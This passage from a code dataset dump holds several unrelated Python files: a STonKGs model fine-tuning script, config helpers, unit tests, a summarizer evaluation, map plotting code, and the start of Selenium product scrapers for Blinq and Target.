self.num_labels), labels)\n elif self.config.problem_type == \"single_label_classification\":\n loss_fct = torch.nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n elif self.config.problem_type == \"multi_label_classification\":\n loss_fct = torch.nn.BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n if not return_dict:\n output = (logits,) + outputs[2:]\n return ((loss,) + output) if loss is not None else output\n\n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n\ndef run_sequence_classification_cv(\n train_data_path: str,\n model_path: str = PRETRAINED_STONKGS_PATH,\n output_dir: 
Optional[str] = STONKGS_OUTPUT_DIR,\n logging_uri_mlflow: Optional[str] = MLFLOW_FINETUNING_TRACKING_URI,\n label_column_name: str = \"labels\",\n class_column_name: str = \"class\",\n epochs: Optional[int] = 10,\n log_steps: int = 500,\n lr: float = 5e-5,\n batch_size: int = 8,\n gradient_accumulation: int = 1,\n task_name: str = \"\",\n deepspeed: bool = True,\n max_dataset_size: int = 100000,\n cv: int = 5,\n) -> Dict:\n \"\"\"Run cross-validation for the sequence classification task(s) using STonKGs.\"\"\"\n # Get data splits\n fine_tuning_df = preprocess_fine_tuning_data(\n train_data_path=train_data_path,\n class_column_name=class_column_name,\n )\n\n train_test_splits = get_train_test_splits(\n fine_tuning_df,\n max_dataset_size=max_dataset_size,\n n_splits=cv,\n )\n\n # Get text evidences and labels\n fine_tuning_data, labels_str = (\n fine_tuning_df.drop(columns=label_column_name),\n fine_tuning_df[label_column_name],\n )\n # Numerically encode labels\n unique_tags = set(label for label in labels_str)\n tag2id = {label: number for number, label in enumerate(unique_tags)}\n id2tag = {value: key for key, value in tag2id.items()}\n labels = pd.Series([int(tag2id[label]) for label in labels_str])\n\n # Initialize the f1-score\n f1_scores = []\n\n # End previous run\n mlflow.end_run()\n # Initialize mlflow run, set tracking URI to use the same experiment for all runs,\n # so that one can compare them\n mlflow.set_tracking_uri(logging_uri_mlflow)\n mlflow.set_experiment(\"STonKGs Fine-Tuning\")\n\n # Initialize a dataframe for all the predicted labels\n result_df = pd.DataFrame()\n\n for idx, indices in enumerate(train_test_splits):\n model = STonKGsForSequenceClassification.from_pretrained(\n pretrained_model_name_or_path=model_path,\n num_labels=len(unique_tags),\n )\n\n # Based on the preprocessed fine-tuning dataframe: Convert the data into the desired dictionary format\n # for the INDRADataset\n train_data = (\n fine_tuning_data.iloc[indices[\"train_idx\"]]\n .reset_index(drop=True)\n .to_dict(orient=\"list\")\n )\n test_data = (\n fine_tuning_data.iloc[indices[\"test_idx\"]].reset_index(drop=True).to_dict(orient=\"list\")\n )\n train_labels = labels[indices[\"train_idx\"]].tolist()\n test_labels = labels[indices[\"test_idx\"]].tolist()\n train_dataset = INDRADataset(encodings=train_data, labels=train_labels)\n test_dataset = INDRADataset(encodings=test_data, labels=test_labels)\n\n # Note that due to the randomization in the batches, the training/evaluation is slightly\n # different every time\n # TrainingArgument uses a default batch size of 8\n training_args = TrainingArguments(\n output_dir=output_dir,\n num_train_epochs=epochs, # total number of training epochs\n logging_steps=log_steps, # reduce the number of logging steps to avoid collisions when writing to the\n # shared database\n # Use deepspeed with a specified config file for speedup\n deepspeed=DEEPSPEED_CONFIG_PATH if deepspeed else None,\n learning_rate=lr,\n report_to=[\"mlflow\"], # log via mlflow\n do_train=True,\n do_predict=True,\n per_device_train_batch_size=batch_size,\n per_device_eval_batch_size=batch_size,\n gradient_accumulation_steps=gradient_accumulation,\n )\n\n # Initialize Trainer based on the training dataset\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset,\n )\n # Train\n trainer.train()\n\n # Log some details about the datasets used in training and testing\n mlflow.log_param(\"label dict\", str(tag2id))\n mlflow.log_param(\"training dataset size\", 
str(len(train_labels)))\n mlflow.log_param(\"training class dist\", str(Counter(train_labels)))\n mlflow.log_param(\"test dataset size\", str(len(test_labels)))\n mlflow.log_param(\"test class dist\", str(Counter(test_labels)))\n\n # Make predictions for the test dataset\n predictions = trainer.predict(test_dataset=test_dataset).predictions\n predicted_labels = np.argmax(predictions, axis=1)\n logger.info(f\"Predicted labels: {predicted_labels}\")\n\n # Save the predicted + true labels\n partial_result_df = pd.DataFrame(\n {\n \"split\": idx,\n \"index\": indices[\"test_idx\"].tolist(),\n \"predicted_label\": predicted_labels.tolist(),\n \"true_label\": test_labels,\n \"evidence\": fine_tuning_data.iloc[indices[\"test_idx\"]][\"input_ids\"].tolist(),\n },\n )\n result_df = result_df.append(\n partial_result_df,\n ignore_index=True,\n )\n\n # Use weighted average\n f1_sc = f1_score(test_labels, predicted_labels, average=\"weighted\")\n f1_scores.append(f1_sc)\n\n # Log the final f1_score\n mlflow.log_metric(\"f1_score_weighted\", f1_sc)\n\n # Log mean and std f1-scores from the cross validation procedure (average and std across all splits) to the\n # standard logger\n logger.info(f\"Mean f1-score: {np.mean(f1_scores)}\")\n logger.info(f\"Std f1-score: {np.std(f1_scores)}\")\n\n # Map the labels in the result df back to their original names\n result_df = result_df.replace({\"predicted_label\": id2tag, \"true_label\": id2tag})\n # Save the result_df\n result_df.to_csv(\n os.path.join(STONKGS_OUTPUT_DIR, \"predicted_labels_stonkgs_\" + task_name + \"df.tsv\"),\n index=False,\n sep=\"\\t\",\n )\n\n # Save the last model\n trainer.save_model(output_dir=os.path.join(STONKGS_OUTPUT_DIR, task_name))\n\n # End the previous run\n mlflow.end_run()\n\n # Log the mean and std f1 score from the cross validation procedure to mlflow\n with mlflow.start_run():\n # Log the task name as well\n mlflow.log_param(\"task name\", task_name)\n mlflow.log_metric(\"f1_score_mean\", np.mean(f1_scores))\n mlflow.log_metric(\"f1_score_std\", np.std(f1_scores))\n\n return {\"f1_score_mean\": np.mean(f1_scores), \"f1_score_std\": np.std(f1_scores)}\n\n\n@click.command()\n@click.option(\"-e\", \"--epochs\", default=5, help=\"Number of epochs\", type=int)\n@click.option(\n \"--cv\", default=5, help=\"Number of cross validation splits (use 1 to omit cv)\", type=int\n)\n@click.option(\"--lr\", default=5e-5, help=\"Learning rate\", type=float)\n@click.option(\n \"--logging_dir\",\n default=MLFLOW_FINETUNING_TRACKING_URI,\n help=\"Mlflow logging/tracking URI\",\n type=str,\n)\n@click.option(\"--log_steps\", default=500, help=\"Number of steps between each log\", type=int)\n@click.option(\n \"--model_path\",\n default=PRETRAINED_STONKGS_PATH,\n help=\"Path of the pretrained model\",\n type=str,\n)\n@click.option(\"--output_dir\", default=STONKGS_OUTPUT_DIR, help=\"Output directory\", type=str)\n@click.option(\"--batch_size\", default=8, help=\"Batch size used in fine-tuning\", type=int)\n@click.option(\n \"--gradient_accumulation_steps\", default=1, help=\"Gradient accumulation steps\", type=int\n)\n@click.option(\"--deepspeed\", default=True, help=\"Whether to use deepspeed or not\", type=bool)\n@click.option(\n \"--max_dataset_size\",\n default=100000,\n help=\"Maximum dataset size of the fine-tuning datasets\",\n type=int,\n)\n@click.option(\"--local_rank\", default=-1, help=\"THIS PARAMETER IS IGNORED\", type=int)\ndef run_all_fine_tuning_tasks(\n epochs: int = 5,\n cv: int = 5,\n log_steps: int = 500,\n lr: float = 5e-5,\n 
model_path: str = PRETRAINED_STONKGS_PATH,\n output_dir: str = STONKGS_OUTPUT_DIR,\n logging_dir: Optional[str] = MLFLOW_FINETUNING_TRACKING_URI,\n batch_size: int = 8,\n gradient_accumulation_steps: int = 1,\n deepspeed: bool = True,\n max_dataset_size: int = 100000, # effectively removes the max dataset size restriction\n local_rank: int = -1,\n):\n \"\"\"Run all fine-tuning tasks at once.\"\"\"\n # Specify all directories and file names\n directories = [\n CELL_LINE_DIR,\n CELL_TYPE_DIR,\n CORRECT_DIR,\n CORRECT_DIR,\n DISEASE_DIR,\n LOCATION_DIR,\n ORGAN_DIR,\n SPECIES_DIR,\n RELATION_TYPE_DIR,\n RELATION_TYPE_DIR,\n ]\n file_names = [\n \"cell_line_ppi_prot.tsv\",\n \"cell_type_ppi_prot.tsv\",\n \"correct_incorrect_binary_ppi_prot.tsv\",\n \"correct_incorrect_multiclass_ppi_prot.tsv\",\n \"disease_ppi_prot.tsv\",\n \"location_ppi_prot.tsv\",\n \"organ_ppi_prot.tsv\",\n \"species_ppi_prot.tsv\",\n \"relation_type_ppi_prot.tsv\",\n \"relation_type_ppi_prot.tsv\",\n ]\n task_names = [\n \"cell_line\",\n \"cell_type\",\n \"correct_binary\",\n \"correct_multiclass\",\n \"disease\",\n \"location\",\n \"organ\",\n \"species\",\n \"interaction\",\n \"polarity\",\n ]\n # Specify the column names of the target variable\n column_names = [\"class\"] * 8 + [\"interaction\"] + [\"polarity\"]\n\n for directory, file, column_name, task_name in zip(\n directories,\n file_names,\n column_names,\n task_names,\n ):\n # Run the 8 fine-tuning tasks\n run_sequence_classification_cv(\n train_data_path=os.path.join(directory, file),\n model_path=model_path,\n output_dir=output_dir,\n logging_uri_mlflow=logging_dir,\n epochs=epochs,\n log_steps=log_steps,\n lr=lr,\n batch_size=batch_size,\n gradient_accumulation=gradient_accumulation_steps,\n class_column_name=column_name,\n task_name=task_name,\n deepspeed=deepspeed,\n max_dataset_size=max_dataset_size,\n cv=cv,\n )\n logger.info(f\"Finished the {task_name} task\")\n\n\nif __name__ == \"__main__\":\n # Set the huggingface environment variable for tokenizer parallelism to false\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n # Run all CV fine-tuning tasks\n run_all_fine_tuning_tasks()\n","sub_path":"src/stonkgs/models/stonkgs_finetuning.py","file_name":"stonkgs_finetuning.py","file_ext":"py","file_size_in_byte":24169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112989924","text":"#\n# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)\n# Ivannikov Institute for System Programming of the Russian Academy of Sciences\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport json\n\n\ndef get_conf_property(conf, name, expected_type=None):\n \"\"\"\n Check that configuration properties dictionary contains the given configuration property and return its value.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param expected_type: Check that given value has an expected type.\n :return: Configuration property value.\n \"\"\"\n if name in conf:\n if expected_type and not 
isinstance(conf[name], expected_type):\n raise TypeError(\"Expect configuration property '{}' to be set with a '{}' value but it has type '{}'\".\n format(name, str(expected_type), str(type(conf[name]))))\n return conf[name]\n else:\n return None\n\n\ndef get_necessary_conf_property(conf, name):\n \"\"\"\n Return configuration property value and expect it to be set.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :return: Configuration property value.\n \"\"\"\n check_necessary_conf_property(conf, name, None)\n return conf[name]\n\n\ndef check_or_set_conf_property(conf, name, default_value=None, expected_type=None):\n \"\"\"\n Check that property is set or set its value with a provided value.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param default_value: Default value to be set.\n :param expected_type: Check that given value has an expected type.\n :return: None\n \"\"\"\n if name not in conf:\n conf[name] = default_value\n check_necessary_conf_property(conf, name, expected_type)\n\n\ndef check_necessary_conf_property(conf, name, expected_type=None):\n \"\"\"\n Check that the property is set and, if an expected type is given, that its value has that type.\n\n :param conf: Dictionary.\n :param name: Configuration property string.\n :param expected_type: Check that given value has an expected type.\n :return: True\n \"\"\"\n if name not in conf:\n raise KeyError(\"Expect configuration property {!r} to be set properly\".format(name))\n elif expected_type and not isinstance(conf[name], expected_type):\n raise TypeError(\"Expect configuration property {!r} to be set with a {!r} value but it has type {!r}\".\n format(name, str(expected_type), str(type(conf[name]))))\n return True\n\n\ndef model_comment(comment_type, text, other=None):\n \"\"\"\n Print model comment in the form accepted by the Klever error trace parser from VRP. 
This simple comment contains\n short json to parse.\n\n For example:\n /* LDV {\"action\": \"REGISTER\", \"type\": \"DISPATCH_BEGIN\", \"comment\": \"Register TTY callbacks.\"} */\n\n :param comment_type: Comment type string.\n :param text: Sentence string with the comment itself.\n :param other: An existing dictionary to which the comment and type should be added\n :return: Final comment string (look at the example above).\n \"\"\"\n if other and isinstance(other, dict):\n comment = other\n else:\n comment = dict()\n\n comment['type'] = comment_type.upper()\n if text:\n comment['comment'] = text\n\n string = json.dumps(comment)\n return \"/* LDV {} */\".format(string)\n","sub_path":"core/core/vtg/emg/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"436915052","text":"import unittest\r\nfrom state_count import *\r\nfrom highest_in_state import *\r\nfrom closest_university import *\r\n\r\n\r\nclass TestCSV(unittest.TestCase):\r\n def test(self):\r\n tests = []\r\n tests.append(['AK', 9])\r\n tests.append(['TX', 446])\r\n tests.append(['AL', 94])\r\n tests.append(['OK', 129])\r\n tests.append(['CA', 716])\r\n tests.append(['FL', 412])\r\n tests.append(['NY', 452])\r\n\r\n for test in tests:\r\n exp = test[1]\r\n act = state_count(test[0])\r\n self.assertEqual(\r\n exp, act, \"state_count('\" + test[0] + \"') incorrect\")\r\n\r\n def test_highest_in_state(self):\r\n tests = []\r\n tests.append(['AK', 20760, 'Alaska Pacific University'])\r\n tests.append(['TX', 52498, 'Southern Methodist University'])\r\n tests.append(['NJ', 50554, 'Stevens Institute of Technology'])\r\n tests.append(['OR', 54200, 'Reed College'])\r\n tests.append(['NV', 32639, 'Sierra Nevada College'])\r\n\r\n for test in tests:\r\n expValue = test[1]\r\n expName = test[2]\r\n self.assertEqual((expValue, expName), highest_in_state(test[0]))\r\n\r\n def test_closest(self):\r\n tests = []\r\n # Seven Lakes HS\r\n tests.append([(15.885002, 'Fortis College'), (29.707459, -95.8101941)])\r\n\r\n # Statue of Liberty\r\n tests.append([(3.3121172, 'Mildred Elley-New York Campus'),\r\n (40.6892534, -74.0466891)])\r\n\r\n # Golden Gate Bridge\r\n tests.append([(2.233386, 'Presidio Graduate School'),\r\n (37.8199286, -122.4804438)])\r\n\r\n for test in tests:\r\n closest = closest_university(test[1])\r\n self.assertEqual(test[0][1], closest[1])\r\n self.assertAlmostEqual(test[0][0], closest[0], 4)\r\n","sub_path":"test_csv.py","file_name":"test_csv.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"260423362","text":"from pymongo import MongoClient\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom nltk import sent_tokenize, word_tokenize\nfrom Rouge import rouge_score\nfrom summarizer_dev import *\nfrom summarizer import Summarizer\nimport matplotlib.pyplot as plt\nimport seaborn\nimport pickle\n\n\ndef get_summaries_and_articles(coll):\n '''\n INPUT: mongo collection object\n OUTPUT: list of summaries, list of articles\n\n Runs through the MongoDB and extracts all of the newser.com summaries\n with their corresponding articles.\n '''\n\n summary_list = []\n article_list = []\n\n for doc in list(coll.find()):\n if doc['full_text'] != ' ':\n summary_list.append(doc['summary'])\n article_list.append(doc['full_text'])\n\n for i in range(len(article_list)):\n text = ''\n 
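# Note (added): each 'full_text' is assumed to be stored as a list of text\n # chunks in Mongo, so the chunks are joined into one string per article\n # before any sentence tokenizing happens downstream.\n 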
for article in article_list[i]:\n text += article\n article_list[i] = text\n\n summary_test = np.unique([summary_list[i] for i in range(len(summary_list))\n if article_list[i] != '' and\n article_list[i] != ' ' and\n len(sent_tokenize(article_list[i])) > 10])\n article_test = np.unique([article for article in article_list\n if article != '' and\n article != ' ' and\n len(sent_tokenize(article)) > 10])\n\n return summary_test, article_test\n\n\ndef make_article_vectors(article_list, vocab, normalize=False):\n '''\n INPUT: list of articles, vocab dict\n OUTPUT: array of sentences, array of vectors\n\n Don't remember why I did this? Probably before I built the summarizer object.\n '''\n article_vectors = []\n sentence_list = []\n for article in article_list:\n sentences = np.array(sent_tokenize(article))\n sentence_list.append(sentences)\n if normalize:\n counts = TfidfVectorizer(stop_words='english', vocabulary=vocab)\n else:\n counts = CountVectorizer(stop_words='english', vocabulary=vocab)\n article_count_vector = get_vector(counts, [article])[0]\n article_vectors.append(article_count_vector)\n return np.array(sentence_list), np.array(article_vectors)\n\n\nif __name__ == '__main__':\n mongo_client = MongoClient()\n db = mongo_client.g_project_data\n coll = db.test_data\n\n summary_list, article_list = get_summaries_and_articles(coll)\n\n mongo_client.close()\n\n idf = unpickle('idf')\n vocab = unpickle('vocab')\n\n count = CountVectorizer(vocabulary=vocab, stop_words='english')\n\n summarizer_multi = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='multi_Tfidf')\n summarizer_single = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='single_Tfidf')\n summarizer_sig = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='significance')\n summarizer_sim = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='similarity')\n summarizer_rand = Summarizer(vocab=vocab, idf=idf, vectorizer=count, scoring='random')\n\n multi_r2 = []\n multi_reduction2 = []\n single_r2 = []\n single_reduction2 = []\n sig_r2 = []\n sig_reduction2 = []\n sim_r2 = []\n sim_reduction2 = []\n rand_r2 = []\n rand_reduction2 = []\n for summary, article in zip(summary_list[53:], article_list[53:]):\n summarizer_multi.fit(article)\n summarizer_single.fit(article)\n summarizer_sig.fit(article)\n summarizer_sim.fit(article)\n summarizer_rand.fit(article)\n multi_r2.append(summarizer_multi.rouge(summary))\n single_r2.append(summarizer_single.rouge(summary))\n sig_r2.append(summarizer_sig.rouge(summary))\n sim_r2.append(summarizer_sim.rouge(summary))\n rand_r2.append(summarizer_rand.rouge(summary))\n multi_reduction2.append(summarizer_multi.reduction)\n single_reduction2.append(summarizer_single.reduction)\n sig_reduction2.append(summarizer_sig.reduction)\n sim_reduction2.append(summarizer_sim.reduction)\n rand_reduction2.append(summarizer_rand.reduction)\n\n plt.boxplot([multi_r2, single_r2, sig_r2, sim_r2, rand_r2])\n plt.ylabel('Rouge Score')\n plt.ylim((0, 0.25))\n plt.plot()\n plt.savefig('../images/boxplot.png')\n\n plt.boxplot([multi_r2, sig_r2, rand_r2])\n plt.ylabel('Rouge Score')\n plt.ylim((0, 0.25))\n plt.plot()\n plt.savefig('../images/boxplot2.png')\n","sub_path":"app/summarizer/test_summarizers.py","file_name":"test_summarizers.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"485970497","text":"from nose2.tools import params\nimport unittest\nfrom test.example_runner 
import run_docstring_example\nfrom hamcrest import assert_that\nfrom allure_commons_test.report import has_test_case\nfrom allure_commons_test.result import has_parameter\nfrom allure_commons.utils import represent\n\n\n@params(\n ((\"alpha\", \"hello\"), (\"betta\", 42)),\n ((\"alpha\", \"world\"), (\"betta\", 777))\n)\ndef test_parametrized_func(first, second):\n \"\"\"\n >>> from nose2.tools import params\n\n >>> @params((\"hello\", 42), (\"world\", 777))\n ... def test_parametrized_func_example(alpha, betta):\n ... pass\n \"\"\"\n first_param_name, first_param_value = first\n second_param_name, second_param_value = second\n\n allure_report = run_docstring_example()\n assert_that(allure_report,\n has_test_case(\"test_parametrized_func_example\",\n has_parameter(first_param_name, represent(first_param_value)),\n has_parameter(second_param_name, represent(second_param_value))\n )\n )\n\n\nclass TestParametrized(unittest.TestCase):\n\n @params(\n ((\"bravo\", {\"hello\": 4}), (\"charlie\", [4, 2])),\n ((\"bravo\", {\"wold\": 2}), (\"charlie\", [7, 7, 7]))\n )\n def test_parametrized_method(self, first, second):\n \"\"\"\n >>> import unittest\n >>> from nose2.tools import params\n\n >>> class TestParametrizedExample(unittest.TestCase):\n ... @params(({\"hello\": 4}, [4, 2]), ({\"wold\": 2}, [7, 7, 7]))\n ... def test_parametrized_method_example(self, bravo, charlie):\n ... pass\n \"\"\"\n first_param_name, first_param_value = first\n second_param_name, second_param_value = second\n\n allure_report = run_docstring_example()\n assert_that(allure_report,\n has_test_case(\"test_parametrized_method_example\",\n has_parameter(first_param_name, represent(first_param_value)),\n has_parameter(second_param_name, represent(second_param_value))\n )\n )\n","sub_path":"allure-nose2/test/parametrized/test_parametrized.py","file_name":"test_parametrized.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445455306","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\nclass Data(object):\r\n def __init__(self, category):\r\n self.__data = self.getPackage(category)\r\n#return the data as a numpy array so we can use its contents\r\n def getPackage(self, category):\r\n return np.fromfile(category + \"01.bin\", dtype='>f')\r\n\r\n def getIndex(self, x, y, z):\r\n#find the datarecord in the datalist\r\n index = self.__data[x + 500* (y + 500 * z)]\r\n#was given on the website\r\n if index < 1000:\r\n return index\r\n return self.getIndex(x+1, y, z)\r\n\r\n\r\ndef CONTOUR(data, ax):\r\n#find z value according to hight in meters\r\n mincolour = 100000\r\n maxcolour = -100000\r\n\r\n z = 8\r\n matrix = []\r\n\r\n list = range(500)\r\n for x in list:\r\n matrix.append([])\r\n for y in list: #the exact same structure i did in assignment 1 with the arrays\r\n point = data.getIndex(x, y, z)\r\n matrix[x].append(point)\r\n\r\n #hanging on all the variables for x..like 1,1 1,2 1,3 etc\r\n if min(matrix[x]) < mincolour:\r\n mincolour = min(matrix[x])\r\n if max(matrix[x]) > maxcolour:\r\n maxcolour= max(matrix[x])\r\n #need the minimum and maximum of all for the coloring\r\n\r\n\r\n\r\n #the following codes are given functions under the matplotlib basemaps examples\r\n contourmap = Basemap(projection='mill', resolution=\"l\", llcrnrlat=23.7, llcrnrlon=-83, urcrnrlat=41.7, urcrnrlon=-62)\r\n 
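# Note (added): the llcrnr/urcrnr values hard-code a US East Coast window that the\r\n # 500x500 data grid is assumed to cover; 'mill' is the Miller cylindrical projection.\r\n 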
contourmap.bluemarble()\r\n contourmap.drawcoastlines()\r\n contourmap.drawstates()\r\n x, y = np.meshgrid(np.linspace(0, contourmap.urcrnrx, 500), np.linspace(0, contourmap.urcrnry, 500))\r\n interval = (maxcolour - mincolour) / 20\r\n steps = np.arange(mincolour, maxcolour, interval)\r\n color = plt.cm.RdYlGn\r\n t_color = color(np.arange(color.N))\r\n t_color = ListedColormap(t_color)\r\n map = ax.contourf(x,y, matrix, levels=steps, cmap=t_color)\r\n return map\r\n\r\n\r\n\r\n\r\ndef WIND(x, y, z, ax):\r\n\r\n value = 5\r\n\r\n data_u = []\r\n data_v = []\r\n data_w = []\r\n\r\n for xachse in range(20):\r\n for yachse in range(20):\r\n data_u.append(xachse+x.getIndex((25)*xachse, (25)*yachse, value))\r\n data_v.append(yachse+y.getIndex((25)*xachse, (25)*yachse, value))\r\n data_w.append(z.getIndex((25) * xachse, (25) * yachse, value))\r\n\r\n#the following calls are again based on the matplotlib basemap examples\r\n windmap = Basemap(projection='mill', resolution=\"l\", llcrnrlat=23.7, llcrnrlon=-83, urcrnrlat=41.7, urcrnrlon=-62)\r\n windmap.bluemarble()\r\n windmap.drawcoastlines()\r\n windmap.drawstates()\r\n color=plt.cm.RdYlGn\r\n a,b = np.meshgrid(np.linspace(0, windmap.urcrnrx, 20), np.linspace(0, windmap.urcrnry, 20)) #makes a grid with 20 points 'arrows'\r\n map = ax.quiver(a,b, data_u, data_v, data_w, cmap=color)\r\n return map\r\n","sub_path":"Assignment2/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"281371662","text":"#Bazaar Class Definitions\n\"\"\"This improvement on BuySoup will not use the inheritance structure and instead will \n\tmake different vendors their own objects to be imported. The reason for this is because\n\teach site has too many particularities to abstract out an inheritance structure. This \n\twill make scripting for the scraping easier (ToysrUs still uses a non-JS interface).\n\t\n\tExample is that during the link gathering at Target, the website may introduce a \n\tpopup that interrupts it. 
In an inheritance structure this would mean having \n\tto construct a control flow that isn't of use in any other website\"\"\"\n\n#Packages\nimport re\nimport csv\nimport requests as r\nfrom bs4 import BeautifulSoup\nfrom datetime import *\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\n#URL Request Values\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'\nHEADERS = {'User-Agent' : user_agent }\n\n#######################################################################################################################\n\nclass blinq:\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\t#Function to get links on a mainpage- can be recently added, or electronics, etc.\n\tdef get_frontpage_lnks(self):\n\t\tlink_list = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.get(self.https)\n\t\ttry:\n\t\t\tpopup = browser.find_element_by_class_name('js-no-thanks')\n\t\t\tpopup.click()\n\t\texcept:\n\t\t\tpass\n\t\tfor x in range(1,31):\n\t\t\tproduct = browser.find_element_by_xpath('//*[@id=\"sli_results_container\"]/div[' + str(x) + ']/figure/a')\n\t\t\tlink_list.append(product.get_attribute('href'))\n\t\tbrowser.close()\n\t\treturn link_list\n\t\n\t#Function to extract info for individual product page, takes in a link list\n\tdef get_products(self, links):\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tfor link in links:\n\t\t\tbrowser.get(link)\n\t\t\ttry:\n\t\t\t\tpopup = browser.find_element_by_class_name('js-no-thanks')\n\t\t\t\tpopup.click()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t#Thank you guy on the internet, can search with any attribute combo with the below code\n\t\t\t#use element[attribute='attributename'] \n\t\t\tname = browser.find_element_by_css_selector(\"h3[itemprop='name']\").text\n\t\t\tprice = browser.find_element_by_css_selector(\"div[class='price']\").text\n\t\t\tfeatures = browser.find_elements_by_tag_name('dd')\n\t\t\tupc = 'Null'\n\t\t\tfor feature in features:\n\t\t\t\tif len(feature.text) == 12:\n\t\t\t\t\tupc = feature.text\n\t\t\tmaster.append([name, price, upc])\n\t\tbrowser.close()\n\t\treturn master\n\t\n\t#Function that gets frontpage products/other page categories work as well\n\tdef get_frontpage(self):\n\t\tmaster = self.get_products(self.get_frontpage_lnks())\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\t\n\tdef get_search(self):\n\t#specific searches?\n\t\treturn\n\t\t\n\tdef get_crawl(self,start_point, limit):\n\t#Want to start at a specifc page with multiple listings (either all or a certain category/subcategory)\n\t#Get a list of the listings, and crawl to get all unique products \n\t\treturn\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\n######################################################################################################################\n\nclass target:\n\tdef __init__(self, https):\t\n\t\tself.https = https\n\t\t\n\t#Initialize the object on a clearance section on the website\n\t#Get the links for the clearance section pages\n\tdef page_flipper(self):\n\t\tpages = [self.https]\n\t\tbase_url 
= 'http://www.target.com'\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.get(base_url + pages[0]) \n\t\tn = browser.find_element_by_css_selector('.dropdown-spaced > button:nth-child(3)').text\n\t\ti = n.find('\\n') -1\n\t\tn = int(n[i])\n\t\tprint(n, 'Pages found')\n\t\tfor x in range(n-1):\n\t\t\tnext_page = browser.find_element_by_css_selector('#plp > div.pagination.h-standardSpacing > a.btn.btn-sm.btn-secondary.btn-icon-only.btn-round.btn-paginate.js-next')\n\t\t\tnext = next_page.get_attribute(\"href\")\n\t\t\tpages.append(next_page.get_attribute(\"href\").replace(base_url,''))\n\t\t\tif x+1 != n-1:\n\t\t\t\tbrowser.get(next)\n\t\tbrowser.close()\n\t\treturn pages\n\t\n\t#Get the links for the clearance section items\n\tdef get_pg_lnks(self):\n\t\tclearance_section_pages = self.page_flipper()\n\t\tprod_lnks = []\n\t\tbase_url = 'http://www.target.com'\n\t\tbrowser = webdriver.Chrome() \n\t\tbrowser.implicitly_wait(5)\n\t\tfor clearance_section in clearance_section_pages:\n\t\t\tbrowser.get(base_url + clearance_section) \n\t\t\thtml = browser.page_source \n\t\t\tsoup = BeautifulSoup(html,'html.parser') \n\t\t\tlinks = soup.findAll('a',{'class':'js-redirect-to-pdp js-altImageChange product--image'})\n\t\t\tfor link in links:\n\t\t\t\tprod_lnks.append(base_url + link['href'])\n\t\tbrowser.close()\n\t\treturn prod_lnks\n\t\n\t#Should really make each individual product scrape use a single function\n\t#Get the information from the products \n\tdef get_products(self):\n\t\tproduct_lnks = self.get_pg_lnks()\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor link in product_lnks:\n\t\t\tbrowser.get(link)\n\t\t\t#Name and price stay consistent\n\t\t\tname = browser.find_element_by_css_selector('.title-product > span:nth-child(1)').text\n\t\t\tprice = browser.find_element_by_css_selector('#js-product-sr-id > div:nth-child(1) > span:nth-child(1)').text\n\t\t\t#Find and click the more info button for UPC and targetID\n\t\t\tmore_info = 